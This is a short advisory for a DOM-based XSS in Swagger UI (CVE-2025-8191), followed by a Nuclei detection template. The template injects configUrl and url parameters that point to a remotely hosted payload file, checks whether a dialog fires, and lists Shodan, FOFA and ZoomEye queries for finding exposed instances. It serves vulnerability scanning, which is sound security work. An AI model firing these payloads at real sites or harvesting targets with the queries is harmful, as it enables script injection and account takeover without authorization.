Swagger UI versions 3.14.1 through 3.37.x are vulnerable to DOM-based Cross-Site Scripting (XSS) attacks. The vulnerability occurs when processing malicious configuration URLs that contain XSS payloads in the Swagger specification. An attacker can craft a malicious configUrl parameter that, when processed by Swagger UI, executes arbitrary JavaScript code in the victim's browser context.
PoC code [publicly available]
id: CVE-2025-8191

info:
  name: Swagger UI >=3.14.1 < 3.38.0 - DOM Based Cross-Site Scripting
  author: DhiyaneshDK
  severity: medium
  description: |
    Swagger UI versions 3.14.1 through 3.37.x are vulnerable to DOM-based Cross-Site Scripting (XSS) attacks. The vulnerability occurs when processing malicious configuration URLs that contain XSS payloads in the Swagger specification. An attacker can craft a malicious configUrl parameter that, when processed by Swagger UI, executes arbitrary JavaScript code in the victim's browser context.
  reference:
    - https://blog.vidocsecurity.com/blog/hacking-swagger-ui-from-xss-to-account-takeovers/
    - https://nvd.nist.gov/vuln/detail/CVE-2025-8191
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2025-8191
    cwe-id: CWE-79
    epss-score: 0.00965
    epss-percentile: 0.75745
    cpe: cpe:2.3:a:smartbear:swagger_ui:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: smartbear
    product: swagger_ui
    shodan-query:
      - http.component:"Swagger"
      - http.component:"swagger"
      - http.favicon.hash:"-1180440057"
    fofa-query: icon_hash="-1180440057"
    zoomeye-query: app:"Swagger UI"
  tags: cve,cve2025,headless,swagger,xss,smartbear,dom-xss

headless:
  - steps:
      - args:
          url: '{{BaseURL}}/{{swagger_path}}'
        action: navigate
      - action: waitdialog
        name: swagger_dom

    payloads:
      swagger_path:
        - 'swagger/index.html?configUrl=https://raw.githubusercontent.com/projectdiscovery/nuclei-templates/main/helpers/payloads/swagger.json'
        - 'swagger/index.html?url=https://raw.githubusercontent.com/projectdiscovery/nuclei-templates/main/helpers/payloads/swagger.json'
        - 'swagger-ui.html?configUrl=https://raw.githubusercontent.com/projectdiscovery/nuclei-templates/main/helpers/payloads/swagger.json'
        - 'swagger-ui.html?url=https://raw.githubusercontent.com/projectdiscovery/nuclei-templates/main/helpers/payloads/swagger.json'
        - 'swagger-ui/index.html?configUrl=https://raw.githubusercontent.com/projectdiscovery/nuclei-templates/main/helpers/payloads/swagger.json'
        - 'swagger-ui/index.html?url=https://raw.githubusercontent.com/projectdiscovery/nuclei-templates/main/helpers/payloads/swagger.json'
        - 'api-docs?configUrl=https://raw.githubusercontent.com/projectdiscovery/nuclei-templates/main/helpers/payloads/swagger.json'
        - 'docs?configUrl=https://raw.githubusercontent.com/projectdiscovery/nuclei-templates/main/helpers/payloads/swagger.json'
        - '?configUrl=https://raw.githubusercontent.com/projectdiscovery/nuclei-templates/main/helpers/payloads/swagger.json'
        - '?url=https://raw.githubusercontent.com/projectdiscovery/nuclei-templates/main/helpers/payloads/swagger.json'
        - 'open-api/swagger-ui.html?configUrl=https://raw.githubusercontent.com/projectdiscovery/nuclei-templates/main/helpers/payloads/swagger.json'
    stop-at-first-match: true

    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - swagger_dom == true

      - type: word
        part: body
        words:
          - "swagger"
        case-insensitive: true
# digest: 4a0a00473045022055c2c3e9e8511eaf9a5778c35ca92d9445e609ca036bcffe768fafa1b01cf704022100d4b6b92a427d5e3b31b6260e93040e25bc918f306c5213eb49dd79068f48a5cc:922c64590222798bb761d5b6d8e72950